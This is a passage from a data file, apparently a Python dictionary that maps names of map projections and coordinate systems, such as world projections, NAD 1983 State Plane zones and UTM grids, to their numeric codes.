'Sphere_Winkel_II': 53019, 'Sphere_Polyconic': 53021, 'Sphere_Quartic_Authalic': 53022, 'Sphere_Loximuthal': 53023, 'Sphere_Bonne': 53024, 'Sphere_Hotine': 53025, 'Sphere_Stereographic': 53026, 'Sphere_Equidistant_Conic': 53027, 'Sphere_Cassini': 53028, 'Sphere_Van_der_Grinten_I': 53029, 'Sphere_Robinson': 53030, 'Sphere_Two_Point_Equidistant': 53031, 'Sphere_Azimuthal_Equidistant': 53032, 'Sphere_Cylindrical_Equal_Area': 53034, 'Sphere_Winkel_Tripel_NGS': 53042, 'Sphere_Aitoff': 53043, 'Sphere_Hammer_Aitoff': 53044, 'Sphere_Flat_Polar_Quartic': 53045, 'Sphere_Craster_Parabolic': 53046, 'Sphere_Times': 53048, 'Sphere_Vertical_Perspective': 53049, 'World_Plate_Carree': 54001, 'World_Equidistant_Cylindrical': 54002, 'World_Miller_Cylindrical': 54003, 'World_Mercator': 54004, 'World_Sinusoidal': 54008, 'World_Mollweide': 54009, 'World_Eckert_VI': 54010, 'World_Eckert_V': 54011, 'World_Eckert_IV': 54012, 'World_Eckert_III': 54013, 'World_Eckert_II': 54014, 'World_Eckert_I': 54015, 'World_Gall_Stereographic': 54016, 'World_Behrmann': 54017, 'World_Winkel_I': 54018, 'World_Winkel_II': 54019, 'World_Polyconic': 54021, 'World_Quartic_Authalic': 54022, 'World_Loximuthal': 54023, 'World_Bonne': 54024, 'World_Hotine': 54025, 'World_Stereographic': 54026, 'World_Equidistant_Conic': 54027, 'World_Cassini': 54028, 'World_Van_der_Grinten_I': 54029, 'World_Robinson': 54030, 'World_Two_Point_Equidistant': 54031, 'World_Azimuthal_Equidistant': 54032, 'World_Cylindrical_Equal_Area': 54034, 'World_Winkel_Tripel_NGS': 54042, 'World_Aitoff': 54043, 'World_Hammer_Aitoff': 54044, 'World_Flat_Polar_Quartic': 54045, 'World_Craster_Parabolic': 54046, 'World_Times': 54048, 'World_Vertical_Perspective': 54049, 'World_Fuller': 54050, 'World_Cube': 54051, 'World_Goode_Homolosine_Land': 54052, 'World_Goode_Homolosine_Ocean': 54053, 'NAD_1927_StatePlane_Guam_FIPS_5400': 65061, 'American_Samoa_1962_StatePlane_American_Samoa_FIPS_5300': 65062, 'NAD_1983_StatePlane_Guam_FIPS_5400': 65161, 'NAD_1983_StatePlane_Kentucky_FIPS_1600': 65163, 'Canada_Albers_Equal_Area_Conic': 102001, 'Canada_Lambert_Conformal_Conic': 102002, 'USA_Contiguous_Albers_Equal_Area_Conic': 102003, 'USA_Contiguous_Lambert_Conformal_Conic': 102004, 'USA_Contiguous_Equidistant_Conic': 102005, 'NAD_1983_Alaska_Albers': 102006, 'Hawaii_Albers_Equal_Area_Conic': 102007, 'North_America_Albers_Equal_Area_Conic': 102008, 'North_America_Lambert_Conformal_Conic': 102009, 'North_America_Equidistant_Conic': 102010, 'Africa_Sinusoidal': 102011, 'Asia_Lambert_Conformal_Conic': 102012, 'Europe_Albers_Equal_Area_Conic': 102013, 'Europe_Lambert_Conformal_Conic': 102014, 'South_America_Lambert_Conformal_Conic': 102015, 'North_Pole_Azimuthal_Equidistant': 102016, 'North_Pole_Lambert_Azimuthal_Equal_Area': 102017, 'North_Pole_Stereographic': 102018, 'South_Pole_Azimuthal_Equidistant': 102019, 'South_Pole_Lambert_Azimuthal_Equal_Area': 102020, 'South_Pole_Stereographic': 102021, 'Africa_Albers_Equal_Area_Conic': 102022, 'Africa_Equidistant_Conic': 102023, 'Africa_Lambert_Conformal_Conic': 102024, 'Asia_North_Albers_Equal_Area_Conic': 102025, 'Asia_North_Equidistant_Conic': 102026, 'Asia_North_Lambert_Conformal_Conic': 102027, 'Asia_South_Albers_Equal_Area_Conic': 102028, 'Asia_South_Equidistant_Conic': 102029, 'Asia_South_Lambert_Conformal_Conic': 102030, 'Europe_Equidistant_Conic': 102031, 'South_America_Equidistant_Conic': 102032, 'South_America_Albers_Equal_Area_Conic': 102033, 'North_Pole_Gnomonic': 102034, 'North_Pole_Orthographic': 102035, 'South_Pole_Gnomonic': 102036, 'South_Pole_Orthographic': 102037, 'The_World_From_Space': 102038, 'USA_Contiguous_Albers_Equal_Area_Conic_USGS_version': 102039, 'D48_Slovenia_TM': 102060, 'Everest_Modified_1969_RSO_Malaya_Meters': 102061, 'Kertau_RSO_Malaya_Meters': 102062, 'Kandawala_Ceylon_Belt_Meters': 102063, 'Kandawala_Ceylon_Belt_Indian_Yards_1937': 102064, 'S-JTSK_Krovak': 102065, 'S-JTSK_Ferro_Krovak_East_North': 102066, 'S-JTSK_Krovak_East_North': 102067, 'EMEP_50_Kilometer_Grid': 102068, 'EMEP_150_Kilometer_Grid': 102069, 'Guernsey_Grid': 102070, 'AGD_1966_ACT_Grid_AGC_Zone': 102071, 'AGD_1966_ISG_54_2': 102072, 'AGD_1966_ISG_54_3': 102073, 'AGD_1966_ISG_55_1': 102074, 'AGD_1966_ISG_55_2': 102075, 'AGD_1966_ISG_55_3': 102076, 'AGD_1966_ISG_56_1': 102077, 'AGD_1966_ISG_56_2': 102078, 'AGD_1966_ISG_56_3': 102079, 'Bermuda_2000_National_Grid': 102090, 'Monte_Mario_Italy_1': 102091, 'Monte_Mario_Italy_2': 102092, 'Roma_1940_Gauss_Boaga_Est': 102093, 'Roma_1940_Gauss_Boaga_Ovest': 102094, 'JAD_2001_Jamaica_Grid': 102095, 'Bab_South_Palau_Azimuthal_Equidistant': 102096, 'ETRS_1989_UTM_Zone_26N': 102097, 'ETRS_1989_UTM_Zone_27N': 102098, 'ETRS_1989_UTM_Zone_39N': 102099, 'WGS_1984_Web_Mercator_Auxiliary_Sphere': 102100, 'NGO_1948_Norway_Zone_1': 102101, 'NGO_1948_Norway_Zone_2': 102102, 'NGO_1948_Norway_Zone_3': 102103, 'NGO_1948_Norway_Zone_4': 102104, 'NGO_1948_Norway_Zone_5': 102105, 'NGO_1948_Norway_Zone_6': 102106, 'NGO_1948_Norway_Zone_7': 102107, 'NGO_1948_Norway_Zone_8': 102108, 'ETRS_1989_Slovenia_TM': 102109, 'RGF_1993_Lambert_93': 102110, 'Chatham_Islands_1979_Map_Grid': 102111, 'NZGD_2000_Chatham_Island_Circuit': 102112, 'WGS_1984_Web_Mercator': 102113, 'Old_Hawaiian_UTM_Zone_4N': 102114, 'Old_Hawaiian_UTM_Zone_5N': 102115, 'American_Samoa_1962_UTM_Zone_2S': 102116, 'NAD_1927_Alaska_Albers_Meters': 102117, 'NAD_1927_Georgia_Statewide_Albers': 102118, 'NAD_1927_Texas_Statewide_Mapping_System': 102119, 'NAD_1927_Michigan_GeoRef_Feet_US': 102120, 'NAD_1983_Michigan_GeoRef_Feet_US': 102121, 'NAD_1927_Michigan_GeoRef_Meters': 102122, 'NAD_1983_Michigan_GeoRef_Meters': 102123, 'NAD_1927_UTM_Zone_1N': 102124, 'NAD_1927_UTM_Zone_2N': 102125, 'NAD_1927_UTM_Zone_59N': 102126, 'NAD_1927_UTM_Zone_60N': 102127, 'NAD_1983_UTM_Zone_1N': 102128, 'NAD_1983_UTM_Zone_2N': 102129, 'NAD_1983_UTM_Zone_59N': 102130, 'NAD_1983_UTM_Zone_60N': 102131, 'NGO_1948_UTM_Zone_32N': 102132, 'NGO_1948_UTM_Zone_33N': 102133, 'NGO_1948_UTM_Zone_34N': 102134, 'NGO_1948_UTM_Zone_35N': 102135, 'NGO_1948_Baerum_Kommune': 102136, 'NGO_1948_Bergenhalvoen': 102137, 'NGO_1948_Oslo_Kommune': 102138, 'EUREF_FIN_TM35FIN': 102139, 'Hong_Kong_1980_Grid': 102140, 'Hong_Kong_1980_UTM_Zone_49N': 102141, 'Hong_Kong_1980_UTM_Zone_50N': 102142, 'QND_1995_UTM_39N': 102143, 'Merchich_Degree_UTM_Zone_28N': 102144, 'JGD_2000_UTM_Zone_51N': 102145, 'JGD_2000_UTM_Zone_52N': 102146, 'JGD_2000_UTM_Zone_53N': 102147, 'JGD_2000_UTM_Zone_54N': 102148, 'JGD_2000_UTM_Zone_55N': 102149, 'JGD_2000_UTM_Zone_56N': 102150, 'Tokyo_UTM_Zone_51N': 102151, 'Tokyo_UTM_Zone_52N': 102152, 'Tokyo_UTM_Zone_53N': 102153, 'Tokyo_UTM_Zone_54N': 102154, 'Tokyo_UTM_Zone_55N': 102155, 'Tokyo_UTM_Zone_56N': 102156, 'ETRS_1989_Kosovo_Grid': 102157, 'Jordan_JTM': 102158, 'Observatorio_Meteorologico_1965_Macau_Grid': 102159, 'Datum_73_Hayford_Gauss_IGeoE': 102160, 'Datum_73_Hayford_Gauss_IPCC': 102161, 'Graciosa_Base_SW_1948_UTM_Zone_26N': 102162, 'Lisboa_Bessel_Bonne': 102163, 'Lisboa_Hayford_Gauss_IGeoE': 102164, 'Lisboa_Hayford_Gauss_IPCC': 102165, 'Observ_Meteorologico_1939_UTM_Zone_25N': 102166, 'Porto_Santo_1936_UTM_Zone_28N': 102167, 'Sao_Braz_UTM_Zone_26N': 102168, 'Selvagem_Grande_1938_UTM_Zone_28N': 102169, 'AGD_1966_VICGRID': 102170, 'GDA_1994_VICGRID94': 102171, 'GDA_1994_South_Australia_Lambert': 102172, 'ETRS_1989_UWPP_1992': 102173, 'ETRS_1989_UWPP_2000_PAS_5': 102174, 'ETRS_1989_UWPP_2000_PAS_6': 102175, 'ETRS_1989_UWPP_2000_PAS_7': 102176, 'ETRS_1989_UWPP_2000_PAS_8': 102177, 'NAD_1927_10TM_AEP_Forest': 102178, 'NAD_1927_10TM_AEP_Resource': 102179, 'NAD_1927_3TM_111': 102180, 'NAD_1927_3TM_114': 102181, 'NAD_1927_3TM_117': 102182, 'NAD_1927_3TM_120': 102183, 'NAD_1983_10TM_AEP_Forest': 102184, 'NAD_1983_10TM_AEP_Resource': 102185, 'NAD_1983_3TM_111': 102186, 'NAD_1983_3TM_114': 102187, 'NAD_1983_3TM_117': 102188, 'NAD_1983_3TM_120': 102189, 'NAD_1983_BC_Environment_Albers': 102190, 'Nord_Maroc_Degree': 102191, 'Sud_Maroc_Degree': 102192, 'Sahara_Degree': 102193, 'UWPP_1992': 102194, 'UWPP_2000_PAS_5': 102195, 'UWPP_2000_PAS_6': 102196, 'UWPP_2000_PAS_7': 102197, 'UWPP_2000_PAS_8': 102198, 'Belge_Lambert_2008': 102199, 'NAD_1983_HARN_UTM_Zone_2S': 102200, 'NAD_1983_HARN_Guam_Map_Grid': 102201, 'NAD_1983_HARN_UTM_Zone_4N': 102202, 'NAD_1983_HARN_UTM_Zone_5N': 102203, 'NAD_1983_HARN_UTM_Zone_11N': 102205, 'NAD_1983_HARN_UTM_Zone_12N': 102206, 'NAD_1983_HARN_UTM_Zone_13N': 102207, 'NAD_1983_HARN_Maine_2000_East_Zone': 102208, 'NAD_1983_HARN_Maine_2000_Central_Zone': 102209, 'NAD_1983_HARN_Maine_2000_West_Zone': 102210, 'NAD_1983_HARN_UTM_Zone_18N': 102211, 'NAD_1983_USFS_R6_Albers': 102218, 'NAD_1983_Wisconsin_TM_US_Ft': 102219, 'NAD_1983_HARN_Wisconsin_TM_US_Ft': 102220, 'Ocotepeque_1935_Costa_Rica_Lambert_Norte': 102221, 'Ocotepeque_1935_Costa_Rica_Lambert_Sur': 102222, 'WGS_1984_Costa_Rica_TM_90': 102223, 'MONREF_1997_UTM_Zone_46N': 102224, 'MONREF_1997_UTM_Zone_47N': 102225, 'MONREF_1997_UTM_Zone_48N': 102226, 'MONREF_1997_UTM_Zone_49N': 102227, 'MONREF_1997_UTM_Zone_50N': 102228, 'NAD_1983_HARN_StatePlane_Alabama_East_FIPS_0101': 102229, 'NAD_1983_HARN_StatePlane_Alabama_West_FIPS_0102': 102230, 'Colombia_West_West_Zone': 102231, 'Bogota_Ciudad_Bogota': 102232, 'MAGNA_Ciudad_Bogota': 102233, 'NAD_1983_CSRS_UTM_Zone_14N': 102234, 'NAD_1983_CSRS_UTM_Zone_15N': 102235, 'NAD_1983_CSRS_UTM_Zone_16N': 102236, 'Pohnpei_Az_Eq_1971': 102237, 'Saipan_Az_Eq_1969': 102238, 'Guam_Geodetic_Triangulation_Network_1963': 102239, 'Guam_Geodetic_Network_1993': 102240, 'NAD_1983_HARN_StatePlane_California_I_FIPS_0401': 102241, 'NAD_1983_HARN_StatePlane_California_II_FIPS_0402': 102242, 'NAD_1983_HARN_StatePlane_California_III_FIPS_0403': 102243, 'NAD_1983_HARN_StatePlane_California_IV_FIPS_0404': 102244, 'NAD_1983_HARN_StatePlane_California_V_FIPS_0405': 102245, 'NAD_1983_HARN_StatePlane_California_VI_FIPS_0406': 102246, 'NAD_1983_HARN_StatePlane_Arizona_East_FIPS_0201': 102248, 'NAD_1983_HARN_StatePlane_Arizona_Central_FIPS_0202': 102249, 'NAD_1983_HARN_StatePlane_Arizona_West_FIPS_0203': 102250, 'NAD_1983_HARN_StatePlane_Arkansas_North_FIPS_0301': 102251, 'NAD_1983_HARN_StatePlane_Arkansas_South_FIPS_0302': 102252, 'NAD_1983_HARN_StatePlane_Colorado_North_FIPS_0501': 102253, 'NAD_1983_HARN_StatePlane_Colorado_Central_FIPS_0502': 102254, 'NAD_1983_HARN_StatePlane_Colorado_South_FIPS_0503': 102255, 'NAD_1983_HARN_StatePlane_Connecticut_FIPS_0600': 102256, 'NAD_1983_HARN_StatePlane_Delaware_FIPS_0700': 102257, 'NAD_1983_HARN_StatePlane_Florida_East_FIPS_0901': 102258, 'NAD_1983_HARN_StatePlane_Florida_West_FIPS_0902': 102259, 'NAD_1983_HARN_StatePlane_Florida_North_FIPS_0903': 102260, 'NAD_1983_HARN_StatePlane_Hawaii_1_FIPS_5101': 102261, 'NAD_1983_HARN_StatePlane_Hawaii_2_FIPS_5102': 102262, 'NAD_1983_HARN_StatePlane_Hawaii_3_FIPS_5103': 102263, 'NAD_1983_HARN_StatePlane_Hawaii_4_FIPS_5104': 102264, 'NAD_1983_HARN_StatePlane_Hawaii_5_FIPS_5105': 102265, 'NAD_1983_HARN_StatePlane_Georgia_East_FIPS_1001': 102266, 'NAD_1983_HARN_StatePlane_Georgia_West_FIPS_1002': 102267, 'NAD_1983_HARN_StatePlane_Idaho_East_FIPS_1101': 102268, 'NAD_1983_HARN_StatePlane_Idaho_Central_FIPS_1102': 102269, 'NAD_1983_HARN_StatePlane_Idaho_West_FIPS_1103': 102270, 'NAD_1983_HARN_StatePlane_Illinois_East_FIPS_1201': 102271, 'NAD_1983_HARN_StatePlane_Illinois_West_FIPS_1202': 102272, 'NAD_1983_HARN_StatePlane_Indiana_East_FIPS_1301': 102273, 'NAD_1983_HARN_StatePlane_Indiana_West_FIPS_1302': 102274, 'NAD_1983_HARN_StatePlane_Iowa_North_FIPS_1401': 102275, 'NAD_1983_HARN_StatePlane_Iowa_South_FIPS_1402': 102276, 'NAD_1983_HARN_StatePlane_Kansas_North_FIPS_1501': 102277, 'NAD_1983_HARN_StatePlane_Kansas_South_FIPS_1502': 102278, 'NAD_1983_HARN_StatePlane_Kentucky_North_FIPS_1601': 102279, 'NAD_1983_HARN_StatePlane_Kentucky_South_FIPS_1602': 102280, 'NAD_1983_HARN_StatePlane_Louisiana_North_FIPS_1701': 102281, 'NAD_1983_HARN_StatePlane_Louisiana_South_FIPS_1702': 102282, 'NAD_1983_HARN_StatePlane_Maine_East_FIPS_1801': 102283, 'NAD_1983_HARN_StatePlane_Maine_West_FIPS_1802': 102284, 'NAD_1983_HARN_StatePlane_Maryland_FIPS_1900': 102285, 'NAD_1983_HARN_StatePlane_Massachusetts_Mainland_FIPS_2001': 102286, 'NAD_1983_HARN_StatePlane_Massachusetts_Island_FIPS_2002': 102287, 'NAD_1983_HARN_StatePlane_Michigan_North_FIPS_2111': 102288, 'NAD_1983_HARN_StatePlane_Michigan_Central_FIPS_2112': 102289, 'NAD_1983_HARN_StatePlane_Michigan_South_FIPS_2113': 102290, 'NAD_1983_HARN_StatePlane_Minnesota_North_FIPS_2201': 102291, 'NAD_1983_HARN_StatePlane_Minnesota_Central_FIPS_2202': 102292, 'NAD_1983_HARN_StatePlane_Minnesota_South_FIPS_2203': 102293, 'NAD_1983_HARN_StatePlane_Mississippi_East_FIPS_2301': 102294, 'NAD_1983_HARN_StatePlane_Mississippi_West_FIPS_2302': 102295, 'NAD_1983_HARN_StatePlane_Missouri_East_FIPS_2401': 102296, 'NAD_1983_HARN_StatePlane_Missouri_Central_FIPS_2402': 102297, 'NAD_1983_HARN_StatePlane_Missouri_West_FIPS_2403': 102298, 'NAD_1983_HARN_StatePlane_Montana_FIPS_2500': 102300, 'NAD_1983_HARN_StatePlane_Nebraska_FIPS_2600': 102304, 'NAD_1983_HARN_StatePlane_Nevada_East_FIPS_2701': 102307, 'NAD_1983_HARN_StatePlane_Nevada_Central_FIPS_2702': 102308, 'NAD_1983_HARN_StatePlane_Nevada_West_FIPS_2703': 102309, 'NAD_1983_HARN_StatePlane_New_Hampshire_FIPS_2800': 102310, 'NAD_1983_HARN_StatePlane_New_Jersey_FIPS_2900': 102311, 'NAD_1983_HARN_StatePlane_New_Mexico_East_FIPS_3001': 102312, 'NAD_1983_HARN_StatePlane_New_Mexico_Central_FIPS_3002': 102313, 'NAD_1983_HARN_StatePlane_New_Mexico_West_FIPS_3003': 102314, 'NAD_1983_HARN_StatePlane_New_York_East_FIPS_3101': 102315, 'NAD_1983_HARN_StatePlane_New_York_Central_FIPS_3102': 102316, 'NAD_1983_HARN_StatePlane_New_York_West_FIPS_3103': 102317, 'NAD_1983_HARN_StatePlane_New_York_Long_Island_FIPS_3104': 102318, 'NAD_1983_HARN_StatePlane_North_Dakota_North_FIPS_3301': 102320, 'NAD_1983_HARN_StatePlane_North_Dakota_South_FIPS_3302': 102321, 'NAD_1983_HARN_StatePlane_Ohio_North_FIPS_3401': 102322, 'NAD_1983_HARN_StatePlane_Ohio_South_FIPS_3402': 102323, 'NAD_1983_HARN_StatePlane_Oklahoma_North_FIPS_3501': 102324, 'NAD_1983_HARN_StatePlane_Oklahoma_South_FIPS_3502': 102325, 'NAD_1983_HARN_StatePlane_Oregon_North_FIPS_3601': 102326, 'NAD_1983_HARN_StatePlane_Oregon_South_FIPS_3602': 102327, 'NAD_1983_HARN_StatePlane_Rhode_Island_FIPS_3800': 102330, 'NAD_1983_HARN_StatePlane_South_Dakota_North_FIPS_4001': 102334, 'NAD_1983_HARN_StatePlane_South_Dakota_South_FIPS_4002': 102335, 'NAD_1983_HARN_StatePlane_Tennessee_FIPS_4100': 102336, 'NAD_1983_HARN_StatePlane_Texas_North_FIPS_4201': 102337, 'NAD_1983_HARN_StatePlane_Texas_North_Central_FIPS_4202': 102338, 'NAD_1983_HARN_StatePlane_Texas_Central_FIPS_4203': 102339, 'NAD_1983_HARN_StatePlane_Texas_South_Central_FIPS_4204': 102340, 'NAD_1983_HARN_StatePlane_Texas_South_FIPS_4205': 102341, 'NAD_1983_HARN_StatePlane_Utah_North_FIPS_4301': 102342, 'NAD_1983_HARN_StatePlane_Utah_Central_FIPS_4302': 102343, 'NAD_1983_HARN_StatePlane_Utah_South_FIPS_4303': 102344, 'NAD_1983_HARN_StatePlane_Vermont_FIPS_4400': 102345, 'NAD_1983_HARN_StatePlane_Virginia_North_FIPS_4501': 102346, 'NAD_1983_HARN_StatePlane_Virginia_South_FIPS_4502': 102347, 'NAD_1983_HARN_StatePlane_Washington_North_FIPS_4601': 102348, 'NAD_1983_HARN_StatePlane_Washington_South_FIPS_4602': 102349, 'NAD_1983_HARN_StatePlane_West_Virginia_North_FIPS_4701': 102350, 'NAD_1983_HARN_StatePlane_West_Virginia_South_FIPS_4702': 102351, 'NAD_1983_HARN_StatePlane_Wisconsin_North_FIPS_4801': 102352, 'NAD_1983_HARN_StatePlane_Wisconsin_Central_FIPS_4802': 102353, 'NAD_1983_HARN_StatePlane_Wisconsin_South_FIPS_4803': 102354, 'NAD_1983_HARN_StatePlane_Wyoming_East_FIPS_4901': 102355, 'NAD_1983_HARN_StatePlane_Wyoming_East_Central_FIPS_4902': 102356, 'NAD_1983_HARN_StatePlane_Wyoming_West_Central_FIPS_4903': 102357, 'NAD_1983_HARN_StatePlane_Wyoming_West_FIPS_4904': 102358, 'NAD_1983_HARN_StatePlane_Puerto_Rico_Virgin_Islands_FIPS_5200': 102361, 'NAD_1983_HARN_StatePlane_Kentucky_FIPS_1600': 102363, 'WGS_1984_ARC_System_Zone_01': 102421, 'WGS_1984_ARC_System_Zone_02': 102422, 'WGS_1984_ARC_System_Zone_03': 102423, 'WGS_1984_ARC_System_Zone_04': 102424, 'WGS_1984_ARC_System_Zone_05': 102425, 'WGS_1984_ARC_System_Zone_06': 102426, 'WGS_1984_ARC_System_Zone_07': 102427, 'WGS_1984_ARC_System_Zone_08': 102428, 'WGS_1984_ARC_System_Zone_09': 102429, 'WGS_1984_ARC_System_Zone_10': 102430, 'WGS_1984_ARC_System_Zone_11': 102431, 'WGS_1984_ARC_System_Zone_12': 102432, 'WGS_1984_ARC_System_Zone_13': 102433, 'WGS_1984_ARC_System_Zone_14': 102434, 'WGS_1984_ARC_System_Zone_15': 102435, 'WGS_1984_ARC_System_Zone_16': 102436, 'WGS_1984_ARC_System_Zone_17': 102437, 'WGS_1984_ARC_System_Zone_18': 102438, 'LKS_1992_Latvia_TM_0': 102440, 'TWD_1967_TM_Taiwan': 102441, 'TWD_1967_TM_Penghu': 102442, 'TWD_1997_TM_Taiwan': 102443, 'TWD_1997_TM_Penghu': 102444, 'NAD_1983_HARN_StatePlane_Hawaii_1_FIPS_5101_Feet': 102461, 'NAD_1983_HARN_StatePlane_Hawaii_2_FIPS_5102_Feet': 102462, 'NAD_1983_HARN_StatePlane_Hawaii_3_FIPS_5103_Feet': 102463, 'NAD_1983_HARN_StatePlane_Hawaii_4_FIPS_5104_Feet': 102464, 'NAD_1983_HARN_StatePlane_Hawaii_5_FIPS_5105_Feet': 102465, 'NAD_1983_HARN_StatePlane_Minnesota_North_FIPS_2201_Feet': 102466, 'NAD_1983_HARN_StatePlane_Minnesota_Central_FIPS_2202_Feet': 102467, 'NAD_1983_HARN_StatePlane_Minnesota_South_FIPS_2203_Feet': 102468, 'NAD_1983_HARN_Mississippi_TM': 102469, 'Nord_Algerie_Ancienne_Degree': 102491, 'Sud_Algerie_Ancienne_Degree': 102492, 'WGS_1984_Complex_UTM_Zone_20N': 102570, 'WGS_1984_Complex_UTM_Zone_21N': 102571, 'WGS_1984_Complex_UTM_Zone_22N': 102572, 'WGS_1984_Complex_UTM_Zone_23N': 102573, 'WGS_1984_Complex_UTM_Zone_24N': 102574, 'WGS_1984_Complex_UTM_Zone_25N': 102575, 'WGS_1984_Complex_UTM_Zone_26N': 102576, 'WGS_1984_Complex_UTM_Zone_27N': 102577, 'WGS_1984_Complex_UTM_Zone_28N': 102578, 'WGS_1984_Complex_UTM_Zone_29N': 102579, 'WGS_1984_Complex_UTM_Zone_30N': 102580, 'NTF_France_I_degrees': 102581, 'NTF_France_II_degrees': 102582, 'NTF_France_III_degrees': 102583, 'NTF_France_IV_degrees': 102584, 'Nord_Algerie_Degree': 102591, 'Sud_Algerie_Degree': 102592, 'NAD_1983_Texas_Centric_Mapping_System_Albers': 102601, 'NAD_1983_Texas_Centric_Mapping_System_Lambert': 102602, 'NAD_1983_Texas_Statewide_Mapping_System': 102603, 'NAD_1983_Georgia_Statewide_Lambert': 102604, 'NAD_1983_Idaho_TM': 102605, 'NAD_1983_Maine_2000_East_Zone': 102606, 'NAD_1983_Maine_2000_Central_Zone': 102607, 'NAD_1983_Maine_2000_West_Zone': 102608, 'NAD_1983_Mississippi_TM': 102609, 'NAD_1983_StatePlane_Alabama_East_FIPS_0101_Feet': 102629, 'NAD_1983_StatePlane_Alabama_West_FIPS_0102_Feet': 102630, 'NAD_1983_StatePlane_Alaska_1_FIPS_5001_Feet': 102631, 'NAD_1983_StatePlane_Alaska_2_FIPS_5002_Feet': 102632, 'NAD_1983_StatePlane_Alaska_3_FIPS_5003_Feet': 102633, 'NAD_1983_StatePlane_Alaska_4_FIPS_5004_Feet': 102634, 'NAD_1983_StatePlane_Alaska_5_FIPS_5005_Feet': 102635, 'NAD_1983_StatePlane_Alaska_6_FIPS_5006_Feet': 102636, 'NAD_1983_StatePlane_Alaska_7_FIPS_5007_Feet': 102637, 'NAD_1983_StatePlane_Alaska_8_FIPS_5008_Feet': 102638, 'NAD_1983_StatePlane_Alaska_9_FIPS_5009_Feet': 102639, 'NAD_1983_StatePlane_Alaska_10_FIPS_5010_Feet': 102640, 'NAD_1983_StatePlane_California_I_FIPS_0401_Feet': 102641, 'NAD_1983_StatePlane_California_II_FIPS_0402_Feet': 102642, 'NAD_1983_StatePlane_California_III_FIPS_0403_Feet': 102643, 'NAD_1983_StatePlane_California_IV_FIPS_0404_Feet': 102644, 'NAD_1983_StatePlane_California_V_FIPS_0405_Feet': 102645, 'NAD_1983_StatePlane_California_VI_FIPS_0406_Feet': 102646, 'NAD_1983_StatePlane_Arizona_East_FIPS_0201_Feet': 102648, 'NAD_1983_StatePlane_Arizona_Central_FIPS_0202_Feet': 102649, 'NAD_1983_StatePlane_Arizona_West_FIPS_0203_Feet': 102650, 'NAD_1983_StatePlane_Arkansas_North_FIPS_0301_Feet': 102651, 'NAD_1983_StatePlane_Arkansas_South_FIPS_0302_Feet': 102652, 'NAD_1983_StatePlane_Colorado_North_FIPS_0501_Feet': 102653, 'NAD_1983_StatePlane_Colorado_Central_FIPS_0502_Feet': 102654, 'NAD_1983_StatePlane_Colorado_South_FIPS_0503_Feet': 102655, 'NAD_1983_StatePlane_Connecticut_FIPS_0600_Feet': 102656, 'NAD_1983_StatePlane_Delaware_FIPS_0700_Feet': 102657, 'NAD_1983_StatePlane_Florida_East_FIPS_0901_Feet': 102658, 'NAD_1983_StatePlane_Florida_West_FIPS_0902_Feet': 102659, 'NAD_1983_StatePlane_Florida_North_FIPS_0903_Feet': 102660, 'NAD_1983_StatePlane_Hawaii_1_FIPS_5101_Feet': 102661, 'NAD_1983_StatePlane_Hawaii_2_FIPS_5102_Feet': 102662, 'NAD_1983_StatePlane_Hawaii_3_FIPS_5103_Feet': 102663, 'NAD_1983_StatePlane_Hawaii_4_FIPS_5104_Feet': 102664, 'NAD_1983_StatePlane_Hawaii_5_FIPS_5105_Feet': 102665, 'NAD_1983_StatePlane_Georgia_East_FIPS_1001_Feet': 102666, 'NAD_1983_StatePlane_Georgia_West_FIPS_1002_Feet': 102667, 'NAD_1983_StatePlane_Idaho_East_FIPS_1101_Feet': 102668, 'NAD_1983_StatePlane_Idaho_Central_FIPS_1102_Feet': 102669, 'NAD_1983_StatePlane_Idaho_West_FIPS_1103_Feet': 102670, 'NAD_1983_StatePlane_Illinois_East_FIPS_1201_Feet': 102671, 'NAD_1983_StatePlane_Illinois_West_FIPS_1202_Feet': 102672, 'NAD_1983_StatePlane_Indiana_East_FIPS_1301_Feet': 102673, 'NAD_1983_StatePlane_Indiana_West_FIPS_1302_Feet': 102674, 'NAD_1983_StatePlane_Iowa_North_FIPS_1401_Feet': 102675, 'NAD_1983_StatePlane_Iowa_South_FIPS_1402_Feet': 102676, 'NAD_1983_StatePlane_Kansas_North_FIPS_1501_Feet': 102677, 'NAD_1983_StatePlane_Kansas_South_FIPS_1502_Feet': 102678, 'NAD_1983_StatePlane_Kentucky_North_FIPS_1601_Feet': 102679, 'NAD_1983_StatePlane_Kentucky_South_FIPS_1602_Feet': 102680, 'NAD_1983_StatePlane_Louisiana_North_FIPS_1701_Feet': 102681, 'NAD_1983_StatePlane_Louisiana_South_FIPS_1702_Feet': 102682, 'NAD_1983_StatePlane_Maine_East_FIPS_1801_Feet': 102683, 'NAD_1983_StatePlane_Maine_West_FIPS_1802_Feet': 102684, 'NAD_1983_StatePlane_Maryland_FIPS_1900_Feet': 102685, 'NAD_1983_StatePlane_Massachusetts_Mainland_FIPS_2001_Feet': 102686, 'NAD_1983_StatePlane_Massachusetts_Island_FIPS_2002_Feet': 102687, 'NAD_1983_StatePlane_Michigan_North_FIPS_2111_Feet': 102688, 'NAD_1983_StatePlane_Michigan_Central_FIPS_2112_Feet': 102689, 'NAD_1983_StatePlane_Michigan_South_FIPS_2113_Feet': 102690, 'NAD_1983_StatePlane_Minnesota_North_FIPS_2201_Feet': 102691, 'NAD_1983_StatePlane_Minnesota_Central_FIPS_2202_Feet': 102692, 'NAD_1983_StatePlane_Minnesota_South_FIPS_2203_Feet': 102693, 'NAD_1983_StatePlane_Mississippi_East_FIPS_2301_Feet': 102694, 'NAD_1983_StatePlane_Mississippi_West_FIPS_2302_Feet': 102695, 'NAD_1983_StatePlane_Missouri_East_FIPS_2401_Feet': 102696, 'NAD_1983_StatePlane_Missouri_Central_FIPS_2402_Feet': 102697, 'NAD_1983_StatePlane_Missouri_West_FIPS_2403_Feet': 102698, 'NAD_1983_StatePlane_Montana_FIPS_2500_Feet': 102700, 'NAD_1983_StatePlane_Nebraska_FIPS_2600_Feet': 102704, 'NAD_1983_StatePlane_Nevada_East_FIPS_2701_Feet': 102707, 'NAD_1983_StatePlane_Nevada_Central_FIPS_2702_Feet': 102708, 'NAD_1983_StatePlane_Nevada_West_FIPS_2703_Feet': 102709, 'NAD_1983_StatePlane_New_Hampshire_FIPS_2800_Feet': 102710, 'NAD_1983_StatePlane_New_Jersey_FIPS_2900_Feet': 102711, 'NAD_1983_StatePlane_New_Mexico_East_FIPS_3001_Feet': 102712, 'NAD_1983_StatePlane_New_Mexico_Central_FIPS_3002_Feet': 102713, 'NAD_1983_StatePlane_New_Mexico_West_FIPS_3003_Feet': 102714, 'NAD_1983_StatePlane_New_York_East_FIPS_3101_Feet': 102715, 'NAD_1983_StatePlane_New_York_Central_FIPS_3102_Feet': 102716, 